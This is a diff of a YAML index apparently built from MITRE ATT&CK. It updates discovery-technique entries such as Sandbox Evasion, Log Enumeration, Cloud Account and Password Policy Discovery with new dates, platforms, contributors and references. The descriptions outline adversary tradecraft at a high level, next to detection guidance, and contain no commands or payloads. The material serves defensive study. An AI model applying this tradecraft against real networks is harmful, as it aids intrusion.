         [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
         to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T19:18:22.305Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Domain Trust Discovery
       x_mitre_detection: |
@@ -51407,7 +52097,6 @@ discovery:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1482
     atomic_tests: []
   T1083:
@@ -51476,12 +52165,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1083
     atomic_tests: []
   T1049:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-09-06T22:35:34.231Z'
       name: System Network Connections Discovery
       description: "Adversaries may attempt to get a listing of network connections
         to or from the compromised system they are currently accessing or from remote
@@ -51558,40 +52246,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1049
     atomic_tests: []
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -51603,6 +52262,10 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -51613,8 +52276,14 @@ discovery:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -51624,9 +52293,28 @@ discovery:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1619:
     technique:
@@ -51659,7 +52347,7 @@ discovery:
         Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage.  Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
 
         Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-11T22:29:43.677Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Cloud Storage Object Discovery
       x_mitre_detection: "System and network discovery techniques normally occur throughout
@@ -51677,12 +52365,11 @@ discovery:
       - 'Cloud Storage: Cloud Storage Enumeration'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1619
     atomic_tests: []
   T1654:
     technique:
-      modified: '2023-09-30T22:18:46.711Z'
+      modified: '2024-10-15T12:24:40.892Z'
       name: Log Enumeration
       description: |-
         Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -51690,11 +52377,14 @@ discovery:
         Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
 
         Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+        In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
       x_mitre_contributors:
       - Bilal Bahadır Yenici
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -51705,7 +52395,7 @@ discovery:
       - macOS
       - Windows
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -51719,6 +52409,10 @@ discovery:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1654
         external_id: T1654
+      - source_name: Permiso GUI-Vil 2023
+        description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+          Cloud Threat Actor. Retrieved August 30, 2024.'
+        url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
       - source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
         description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
           of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
@@ -51738,56 +52432,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1654
     atomic_tests: []
   T1087.004:
     technique:
-      x_mitre_platforms:
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
-      type: attack-pattern
-      created: '2020-02-21T21:08:36.570Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.004
-        url: https://attack.mitre.org/techniques/T1087/004
-      - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
-        source_name: Microsoft msolrolemember
-      - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
-          6, 2019.
-        url: https://github.com/True-Demon/raindance
-        source_name: GitHub Raindance
-      - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
-        source_name: Microsoft AZ CLI
-      - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
-          Directory Leaks via Azure. Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
-        source_name: Black Hills Red Teaming MS AD Azure, 2018
-      - source_name: AWS List Roles
-        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
-      - source_name: AWS List Users
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
-        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
-      - source_name: Google Cloud - IAM Servie Accounts List API
-        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
-        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
-          August 4, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:51:18.808Z'
       name: Cloud Account
       description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
         accounts are those created and configured by an organization for use by users,
@@ -51809,19 +52458,61 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
 
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      - IaaS
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+      created: '2020-02-21T21:08:36.570Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1087/004
+        external_id: T1087.004
+      - source_name: AWS List Roles
+        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+      - source_name: AWS List Users
+        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+      - source_name: Black Hills Red Teaming MS AD Azure, 2018
+        description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
+          Directory Leaks via Azure. Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+      - source_name: Google Cloud - IAM Servie Accounts List API
+        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+          August 4, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+      - source_name: Microsoft AZ CLI
+        description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+      - source_name: Microsoft msolrolemember
+        description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+      - source_name: GitHub Raindance
+        description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+          6, 2019.
+        url: https://github.com/True-Demon/raindance
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1057:
     technique:
@@ -51892,46 +52583,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1057
     atomic_tests: []
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -51955,6 +52611,9 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
         the environment. Data and events should not be viewed in isolation, but as
@@ -51965,9 +52624,14 @@ discovery:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -51977,12 +52641,39 @@ discovery:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1069.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:14:42.184Z'
       name: 'Permission Groups Discovery: Local Groups'
       description: |-
         Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
@@ -52025,12 +52716,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.001
     atomic_tests: []
   T1201:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:02:44.477Z'
       name: Password Policy Discovery
       description: |-
         Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
@@ -52041,28 +52731,31 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Regina Elwell
+      - Sudhanshu Chauhan, @Sudhanshu_C
+      - Isif Ibrahima, Mandiant
+      - Austin Clark, @c2defense
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor logs and processes for tools and command line arguments
         that may indicate they're being used for password policy discovery. Correlate
         that activity with other suspicious activity from the originating system to
         reduce potential false positives from valid user or administrator activity.
         Adversaries will likely attempt to find the password policy early in an operation
         and the activity is likely to happen with other Discovery activity.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - IaaS
       - Network
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.5'
-      x_mitre_contributors:
-      - Regina Elwell
-      - Sudhanshu Chauhan, @Sudhanshu_C
-      - Isif Ibrahima, Mandiant
-      - Austin Clark, @c2defense
+      - Identity Provider
+      - SaaS
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Metadata'
       - 'Command: Command Execution'
@@ -52095,9 +52788,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1201
     atomic_tests: []
   T1614.001:
@@ -52140,7 +52832,7 @@ discovery:
         description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
           the Doppelgänging technique. Retrieved May 22, 2018.
         url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:00:56.174Z'
       name: 'System Location Discovery: System Language Discovery'
       description: "Adversaries may attempt to gather information about the system
         language of a victim in order to infer the geographical location of that host.
@@ -52179,13 +52871,11 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614.001
     atomic_tests: []
   T1012:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:56:37.011Z'
       name: Query Registry
       description: |-
         Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
@@ -52226,87 +52916,85 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1012
     atomic_tests: []
   T1614:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:07:23.511Z'
+      name: System Location Discovery
+      description: |2-
+
+        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Pooja Natarajan, NEC Corporation India
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Wes Hurd
       - Katie Nickels, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
+
+        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      - IaaS
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Process: OS API Execution'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
       created: '2021-04-01T16:42:08.735Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1614
         url: https://attack.mitre.org/techniques/T1614
-      - source_name: FBI Ragnar Locker 2020
-        url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
-        description: FBI. (2020, November 19). Indicators of Compromise Associated
-          with Ragnar Locker Ransomware. Retrieved April 1, 2021.
-      - source_name: Sophos Geolocation 2016
-        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
-        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
-          target you based on where you live. Retrieved April 1, 2021.'
+        external_id: T1614
       - source_name: Bleepingcomputer RAT malware 2020
-        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
         description: Abrams, L. (2020, October 23). New RAT malware gets commands
           via Discord, has ransomware feature. Retrieved April 1, 2021.
+        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
       - source_name: AWS Instance Identity Documents
-        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
         description: Amazon. (n.d.). Instance identity documents. Retrieved April
           2, 2021.
-      - source_name: Microsoft Azure Instance Metadata 2021
-        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
-        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
-          (Windows). Retrieved April 2, 2021.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
       - source_name: Securelist Trasparent Tribe 2020
-        url: https://securelist.com/transparent-tribe-part-1/98127/
         description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
           part 1. Retrieved April 1, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
-      name: System Location Discovery
-      description: |2-
-
-        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
-        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
-        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_detection: |-
-        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
-        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
-
